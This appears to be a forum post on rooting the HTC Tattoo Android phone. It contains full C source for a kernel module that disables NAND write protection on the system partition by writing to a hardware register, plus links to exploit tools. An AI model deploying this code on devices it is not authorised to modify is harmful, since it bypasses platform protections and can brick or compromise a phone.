Jump to content
pyth0n3

Get Access root on htc tattoo video

Recommended Posts

Exploit an unpatched bug for 2.6.29 kernel version of htc android based to get root

This flaw was found by xda-developers

This procedure can be also automated by writting a script in some programming language

Video ===>>> Watch online

Video ===>>> Download video

Tools download:

Android SDK ===>>> Download here

Tat00hack ===>>> Download here

Exploit source code

#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/delay.h>
#include <linux/errno.h>
#include <linux/io.h>

int __init unprotect_nand(void)
{
int* addr;
printk("Hack: unprotecting Tattoo system partition\n");
addr = ioremap(0xA0B00000, 0x1000);
if (addr) {
printk("NAND protect value 0x%X\n", *addr);
*addr = 0;
iounmap(addr);
}
printk("Done - now be extremly careful!!!\n");
return 0;
}

void __exit unprotect_nand_exit(void)
{
printk("unprotect nand modukle exit!\n");
}

module_init(unprotect_nand);
module_exit(unprotect_nand_exit);
MODULE_DESCRIPTION("Tattoo hack - enable write protect");
MODULE_AUTHOR("bool_s");
MODULE_LICENSE("GPL");

G

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...